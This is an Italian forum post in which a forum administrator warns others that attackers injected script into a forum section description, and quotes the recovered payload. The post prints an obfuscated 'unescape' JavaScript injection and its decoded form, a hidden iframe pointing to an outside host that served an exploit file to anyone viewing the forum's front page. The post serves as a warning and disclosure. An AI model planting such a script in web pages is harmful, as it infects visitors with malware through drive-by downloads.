Ciao, prima volta qui a postare.
Volevo avvertire chi ha un forum (almeno versione prima dell'aggiornamento) del fatto che qualcuno puo' inserire codice java nella descrizione della sezione forum.
L'hanno appena fatto con me... ho cancellato tutto il forum e tabelle e installato l'ultima versione sperando non possano piu' farlo.
Andando a guardare nella tabella sql dove c'e' il campo descrizione mi sono trovato questo: "<script language=javascript>document.write(unescape('%3C%6 9%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A% 2F%2F%69%66%72%61%6D%65%73%69%74%65%2E%62%69%7A%2F %64%6C%2F%61%64%76%35%31%30%2E%70%68%70%22%20%73%7 4%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E% 65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>" attaccato alla mia descrizione.
Tradotto dai codici escape esadecimali il risultato e': <iframe src="http://iframesite.biz/dl/adv510.php" style="display:none"></iframe>
Controllando quindi qui: http://iframesite.biz/dl ho trovato la directory adv510 che contiene il file che con quello script scaricavano sulle macchine di chi solamente visualizzava la prima pagina del mio forum. Il file in questione (riconosciuto dall'antivirus dei miei utenti) e' : sploit.anr
Non so se con la nuova versione del forum possono rifare ancora un'iniezione di codice del genere... e non e' visibile dalla pagina ma solo dalla tabella sql.